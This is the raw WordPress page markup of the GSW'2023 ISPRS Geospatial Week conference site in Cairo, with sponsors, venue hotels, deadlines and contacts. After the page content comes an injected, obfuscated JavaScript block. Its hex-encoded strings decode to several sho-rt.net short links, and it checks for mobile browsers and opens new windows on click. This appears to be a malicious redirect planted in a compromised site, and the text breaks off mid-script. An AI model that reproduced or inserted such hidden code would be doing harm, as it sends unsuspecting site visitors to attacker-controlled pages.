Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#686868\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]&nbsp;</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 